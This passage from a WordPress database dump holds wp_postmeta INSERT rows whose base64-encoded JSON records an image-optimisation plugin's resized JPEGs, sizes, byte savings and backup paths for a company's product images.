MDE2XC8wOVwvcXVpay1mcmVlemUtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY4NSwidGltZSI6MTQ4MzU2NjM0NCwiaWQiOjE3MjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9xdWlrLWZyZWV6ZS00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3F1aWstZnJlZXplLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcXVpay1mcmVlemUtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjc3NywidGltZSI6MTQ4MzU2NjM0NywiaWQiOjE3MjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9xdWlrLWZyZWV6ZS05MHg5MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9xdWlrLWZyZWV6ZS05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcXVpay1mcmVlemUtOTB4OTAuanBnIiwicmVkdWN0aW9uIjo0NTEsInRpbWUiOjE0ODM1NjYzNTEsImlkIjoxNzIwfV0='); 
INSERT INTO `wp_postmeta` VALUES (29302, 1717, 'wpfc_optimisation_reduction', '10873'); 
INSERT INTO `wp_postmeta` VALUES (29303, 1717, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXJzLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXJzLmpwZyIsIndpZHRoIjozNTAwLCJoZWlnaHQiOjIzMjUsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjYzNTUsImlkIjoiMTcxNyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXJzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXJzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXJzLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo2MzMsInRpbWUiOjE0ODM1NjYzNTksImlkIjoxNzE3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Flcm8tZHVzdGVycy04MDB4NTMxLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMxLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Flcm8tZHVzdGVycy04MDB4NTMxLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2Flcm8tZHVzdGVycy04MDB4NTMxLmpwZyIsInJlZHVjdGlvbiI6OTIxLCJ0aW1lIjoxNDgzNTY2MzYzLCJpZCI6MTcxN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtNzY4eDUxMC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtNzY4eDUxMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtNzY4eDUxMC5qcGciLCJyZWR1Y3Rpb24iOjEwNjMsInRpbWUiOjE0ODM1NjYzNjgsImlkIjoxNzE3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Flcm8tZHVzdGVycy0xNjAweDEwNjMuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2MywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtMTYwMHgxMDYzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2Flcm8tZHVzdGVycy0xNjAweDEwNjMuanBnIiwicmVkdWN0aW9uIjoyMDA0LCJ0aW1lIjoxNDgzNTY2MzczLCJpZCI6MTcxN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU5MiwidGltZSI6MTQ4MzU2NjM3NywiaWQiOjE3MTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXJzLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXJzLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXJzLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NTAsInRpbWUiOjE0ODM1NjYzODAsImlkIjoxNzE3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Flcm8tZHVzdGVycy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Flcm8tZHVzdGVycy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2Flcm8tZHVzdGVycy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTA5LCJ0aW1lIjoxNDgzNTY2Mzg0LCJpZCI6MTcxN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjc1NCwidGltZSI6MTQ4MzU2NjM4OCwiaWQiOjE3MTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjU0NiwidGltZSI6MTQ4MzU2NjM5MSwiaWQiOjE3MTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjk5MCwidGltZSI6MTQ4MzU2NjM5NSwiaWQiOjE3MTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjkyNSwidGltZSI6MTQ4MzU2NjM5OSwiaWQiOjE3MTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtNDUweDI5OS5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtNDUweDI5OS5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjI5OSIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9hZXJvLWR1c3RlcnMtNDUweDI5OS5qcGciLCJyZWR1Y3Rpb24iOjEwMzksInRpbWUiOjE0ODM1NjY0MDMsImlkIjoxNzE3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXJzLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Flcm8tZHVzdGVycy05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXJzLTkweDkwLmpwZyIsInJlZHVjdGlvbiI6NDQ3LCJ0aW1lIjoxNDgzNTY2NDA2LCJpZCI6MTcxN31d'); 
INSERT INTO `wp_postmeta` VALUES (29304, 1716, 'wpfc_optimisation_reduction', '17477'); 
INSERT INTO `wp_postmeta` VALUES (29305, 1716, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3Rlci5qcGciLCJ3aWR0aCI6NTYxNiwiaGVpZ2h0IjozNjM2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTY2NDExLCJpZCI6IjE3MTYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Flcm8tZHVzdGVyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXItMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9hZXJvLWR1c3Rlci0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6OTE5LCJ0aW1lIjoxNDgzNTY2NDE1LCJpZCI6MTcxNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3Rlci04MDB4NTE4LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTE4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Flcm8tZHVzdGVyLTgwMHg1MTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXItODAweDUxOC5qcGciLCJyZWR1Y3Rpb24iOjIwNjksInRpbWUiOjE0ODM1NjY0MTksImlkIjoxNzE2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Flcm8tZHVzdGVyLTc2OHg0OTcuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0OTcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXItNzY4eDQ5Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9hZXJvLWR1c3Rlci03Njh4NDk3LmpwZyIsInJlZHVjdGlvbiI6MTkwOCwidGltZSI6MTQ4MzU2NjQyMywiaWQiOjE3MTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXItMTYwMHgxMDM2LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwMzYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXItMTYwMHgxMDM2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2Flcm8tZHVzdGVyLTE2MDB4MTAzNi5qcGciLCJyZWR1Y3Rpb24iOjU5NjYsInRpbWUiOjE0ODM1NjY0MjgsImlkIjoxNzE2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Flcm8tZHVzdGVyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9hZXJvLWR1c3Rlci0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NzM3LCJ0aW1lIjoxNDgzNTY2NDMxLCJpZCI6MTcxNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3Rlci0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Flcm8tZHVzdGVyLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXItMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjU4MCwidGltZSI6MTQ4MzU2NjQzNCwiaWQiOjE3MTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3Rlci0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2Flcm8tZHVzdGVyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2NDQsInRpbWUiOjE0ODM1NjY0MzgsImlkIjoxNzE2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Flcm8tZHVzdGVyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9hZXJvLWR1c3Rlci01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTcxNiwidGltZSI6MTQ4MzU2NjQ0MSwiaWQiOjE3MTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3Rlci0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Flcm8tZHVzdGVyLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXItMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQzMiwidGltZSI6MTQ4MzU2NjQ0NSwiaWQiOjE3MTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3Rlci0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Flcm8tZHVzdGVyLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXItMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjY4MSwidGltZSI6MTQ4MzU2NjQ0OCwiaWQiOjE3MTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hZXJvLWR1c3Rlci0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Flcm8tZHVzdGVyLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWVyby1kdXN0ZXItMzAw